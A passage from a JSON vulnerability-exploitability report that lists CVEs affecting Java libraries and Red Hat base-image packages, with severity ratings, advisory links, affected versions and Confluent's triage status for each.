          "url": "https://lists.apache.org/thread/zmxh1pl2zohov5ntdh4lt85gfrlchgpy"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54399"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-54399"
        }
      ],
      "published": "2026-07-01T17:16:36+00:00",
      "updated": "2026-07-24T20:04:03+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.apache.httpcomponents.core5/httpcore5@5.0.2",
          "versions": [
            {
              "version": "5.0.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:36048e5d-22a1-48a8-8b91-d48b353ddac7/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5@5.0.2"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5@5.0.2"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5@5.0.2"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5@5.0.2"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-54428",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400,
        770
      ],
      "description": "Allocation of resources without limits or throttling in the HTTP/2 HPACK decoder in Apache HttpComponents Core (5.4.2 and earlier, 5.5-beta1 and earlier) allows an remote attacker to cause a denial of service through memory exhaustion by sending oversized compressed header blocks before the HTTP/2 SETTINGS acknowledgement causes the configured header list size limit to be applied.",
      "recommendation": "Upgrade org.apache.httpcomponents.core5:httpcore5-h2 to version 5.4.3, 5.5-beta2",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-54428"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/07/01/3"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-54428"
        },
        {
          "url": "https://github.com/apache/httpcomponents-core"
        },
        {
          "url": "https://github.com/apache/httpcomponents-core/commit/1ea1239bbbe3442a8382a87279c0a8119a7e358e"
        },
        {
          "url": "https://github.com/apache/httpcomponents-core/commit/cc30ee058a7b10cbf4ad3dd6270ab6d1f6a74c49"
        },
        {
          "url": "https://lists.apache.org/thread/5zjp8vczvxq19pw2rvhs21q446bhl0sd"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54428"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-54428"
        }
      ],
      "published": "2026-07-01T18:16:34+00:00",
      "updated": "2026-07-24T20:03:41+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.apache.httpcomponents.core5/httpcore5-h2@5.0.2",
          "versions": [
            {
              "version": "5.0.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:36048e5d-22a1-48a8-8b91-d48b353ddac7/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5-h2@5.0.2"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5-h2@5.0.2"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5-h2@5.0.2"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5-h2@5.0.2"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-64607",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        772
      ],
      "description": "HttpClient based on the classic i/o model fails to correctly release the underlying connection back to the connection manager if it encounters an invalid or unsupported `Content-Encoding` header value in the response message.\u00a0Please note this defect does not affect HttpClient based on the async i/o model.\n\nThis issue affects Apache HttpComponents Client: from 5.0-alpha1 through 5.6.2.",
      "recommendation": "Upgrade org.apache.httpcomponents.client5:httpclient5 to version 5.6.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-64607"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/08/13/5"
        },
        {
          "url": "https://github.com/apache/httpcomponents-client"
        },
        {
          "url": "https://github.com/apache/httpcomponents-client/commit/55733f4121f7ba26ddf04fe12739d9c15962cb94"
        },
        {
          "url": "https://github.com/apache/httpcomponents-client/commit/ebac9512f555c4a355cad3f59ef2db69b597cc97"
        },
        {
          "url": "https://github.com/apache/httpcomponents-client/releases/tag/rel/v5.6.3"
        },
        {
          "url": "https://github.com/apache/httpcomponents-client/releases/tag/rel/v5.7-alpha1"
        },
        {
          "url": "https://lists.apache.org/thread/qqfzo3fqcdk4l5496vz95ppvl4ty511q"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-64607"
        }
      ],
      "published": "2026-07-31T11:17:11+00:00",
      "updated": "2026-08-13T17:17:33+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.0.3",
          "versions": [
            {
              "version": "5.0.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:36048e5d-22a1-48a8-8b91-d48b353ddac7/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.0.3"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.0.3"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.0.3"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.0.3"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-33117",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 9.1,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
        }
      ],
      "cwes": [
        287,
        347
      ],
      "description": "The Java Key Vault Keys library in the Azure SDK for Java contains an issue in the local cryptographic verification path where authentication tag comparison was implemented incorrectly. In affected applications that use the vulnerable local cryptography path, specially crafted encrypted input may bypass integrity verification checks. Operations delegated to the Key Vault service are not affected. The issue is addressed in version 4.10.6.",
      "recommendation": "Upgrade com.azure:azure-security-keyvault-keys to version 4.10.6",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-33117"
        },
        {
          "url": "https://github.com/Azure/azure-sdk-for-java"
        },
        {
          "url": "https://github.com/Azure/azure-sdk-for-java/commit/1b5c5c79d85a5c9a9cfd07f6cdff6fd0f50eccf9"
        },
        {
          "url": "https://github.com/Azure/azure-sdk-for-java/pull/48476"
        },
        {
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33117"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33117"
        }
      ],
      "published": "2026-05-12T18:17:04+00:00",
      "updated": "2026-06-17T10:36:58+00:00",
      "affects": [
        {
          "ref": "pkg:maven/com.azure/azure-security-keyvault-keys@4.9.2",
          "versions": [
            {
              "version": "4.9.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:0a2a2284-e186-40c4-84a6-9946617cb8d0/1#pkg:maven/com.azure/azure-security-keyvault-keys@4.9.2"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:maven/com.azure/azure-security-keyvault-keys@4.9.2"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:maven/com.azure/azure-security-keyvault-keys@4.9.2"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:maven/com.azure/azure-security-keyvault-keys@4.9.2"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:maven/com.azure/azure-security-keyvault-keys@4.9.2"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:maven/com.azure/azure-security-keyvault-keys@4.9.2"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:maven/com.azure/azure-security-keyvault-keys@4.9.2"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:maven/com.azure/azure-security-keyvault-keys@4.9.2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "protected_by_mitigating_control",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. the product delegates key operations to the Azure Key Vault service (RSA-OAEP wrap/unwrap for envelope encryption); the vulnerable client-side local crypto path is not exercised, so the security-feature bypass is not reachable."
      }
    },
    {
      "id": "CVE-2026-40984",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400,
        770
      ],
      "description": "In Micrometer, it is possible for a user to provide specially crafted HTTP requests that may cause a denial-of-service (DoS) condition.\n\nAffected versions:\nmicrometer-core 1.16.0 through 1.16.5; 1.15.0 through 1.15.11; 1.14.0 through 1.14.15; 1.13.0 through 1.13.18; 1.9.0 through 1.9.17.\nmicrometer-jetty11 1.16.0 through 1.16.5; 1.15.0 through 1.15.11; 1.14.0 through 1.14.15; 1.13.0 through 1.13.18.\nmicrometer-jetty12 1.16.0 through 1.16.5; 1.15.0 through 1.15.11; 1.14.0 through 1.14.15; 1.13.0 through 1.13.18.",
      "recommendation": "Upgrade io.micrometer:micrometer-core to version 1.16.6, 1.15.12",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-40984"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36839"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:37390"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:41951"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:50848"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:50849"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54435"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-40984"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2486716"
        },
        {
          "url": "https://github.com/micrometer-metrics/micrometer"
        },
        {
          "url": "https://github.com/micrometer-metrics/micrometer/commit/36da131525228188a36779a28471a76c79213dd4"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40984"
        },
        {
          "url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-40984.json"
        },
        {
          "url": "https://spring.io/security/cve-2026-40984"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-40984"
        }
      ],
      "published": "2026-06-09T05:16:34+00:00",
      "updated": "2026-08-13T13:18:47+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.micrometer/micrometer-core@1.14.4",
          "versions": [
            {
              "version": "1.14.4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:fe1a73d2-1fae-4971-95ae-518949f1e0d6/1#pkg:maven/io.micrometer/micrometer-core@1.14.4"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:maven/io.micrometer/micrometer-core@1.14.4"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:maven/io.micrometer/micrometer-core@1.14.4"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:maven/io.micrometer/micrometer-core@1.14.4"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:maven/io.micrometer/micrometer-core@1.14.4"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:maven/io.micrometer/micrometer-core@1.14.4"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:maven/io.micrometer/micrometer-core@1.14.4"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:maven/io.micrometer/micrometer-core@1.14.4"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:maven/io.micrometer/micrometer-core@1.14.4"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:maven/io.micrometer/micrometer-core@1.14.4"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2005-2541",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 10,
          "severity": "high",
          "method": "CVSSv2",
          "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H"
        }
      ],
      "description": "Tar 1.15.1 does not properly warn the user when extracting setuid or setgid files, which may allow local users or remote attackers to gain privileges.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2005-2541"
        },
        {
          "url": "http://marc.info/?l=bugtraq&m=112327628230258&w=2"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2005-2541"
        },
        {
          "url": "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2005-2541"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2005-2541"
        }
      ],
      "published": "2005-08-10T04:00:00+00:00",
      "updated": "2026-04-16T00:27:16+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2",
          "versions": [
            {
              "version": "2:1.30-11.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2018-1000654",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.1,
          "severity": "high",
          "method": "CVSSv2",
          "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4,
          "severity": "low",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "description": "GNU Libtasn1-4.13 libtasn1-4.13 version libtasn1-4.13, libtasn1-4.12 contains a DoS, specifically CPU usage will reach 100% when running asn1Paser against the POC due to an issue in _asn1_expand_object_id(p_tree), after a long time, the program will be killed. This attack appears to be exploitable via parsing a crafted file.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2018-1000654"
        },
        {
          "url": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00009.html"
        },
        {
          "url": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00018.html"
        },
        {
          "url": "http://www.securityfocus.com/bid/105151"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2018-1000654"
        },
        {
          "url": "https://gitlab.com/gnutls/libtasn1/issues/4"
        },
        {
          "url": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000654"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-5352-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2018-1000654"
        }
      ],
      "published": "2018-08-20T19:31:44+00:00",
      "updated": "2026-06-17T01:33:01+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libtasn1@4.13-6.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "4.13-6.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libtasn1@4.13-6.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libtasn1@4.13-6.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libtasn1@4.13-6.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libtasn1@4.13-6.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libtasn1@4.13-6.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libtasn1@4.13-6.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libtasn1@4.13-6.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libtasn1@4.13-6.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libtasn1@4.13-6.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libtasn1@4.13-6.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libtasn1@4.13-6.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libtasn1@4.13-6.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libtasn1@4.13-6.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libtasn1@4.13-6.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libtasn1@4.13-6.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libtasn1@4.13-6.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libtasn1@4.13-6.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libtasn1@4.13-6.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libtasn1@4.13-6.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libtasn1@4.13-6.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libtasn1@4.13-6.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2018-1000879",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.3,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.3,
          "severity": "low",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        476
      ],
      "description": "libarchive version commit 379867ecb330b3a952fb7bfa7bffb7bbd5547205 onwards (release v3.3.0 onwards) contains a CWE-476: NULL Pointer Dereference vulnerability in ACL parser - libarchive/archive_acl.c, archive_acl_from_text_l() that can result in Crash/DoS. This attack appear to be exploitable via the victim must open a specially crafted archive file.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2018-1000879"
        },
        {
          "url": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00055.html"
        },
        {
          "url": "http://www.securityfocus.com/bid/106324"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2018-1000879"
        },
        {
          "url": "https://bugs.launchpad.net/ubuntu/+source/libarchive/+bug/1794909"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/1105"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/1105/commits/15bf44fd2c1ad0e3fd87048b3fcc90c4dcff1175"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CBOCC2M6YGPZA6US43YK4INPSJZZHRTG/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W645KCLWFDBDGFJHG57WOVXGE62QSIJI/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZVXA7PHINVT6DFF6PRLTDTVTXKDLVHNF/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000879"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2018-1000879"
        }
      ],
      "published": "2018-12-20T17:29:01+00:00",
      "updated": "2026-06-17T01:33:14+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.3.3-7.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
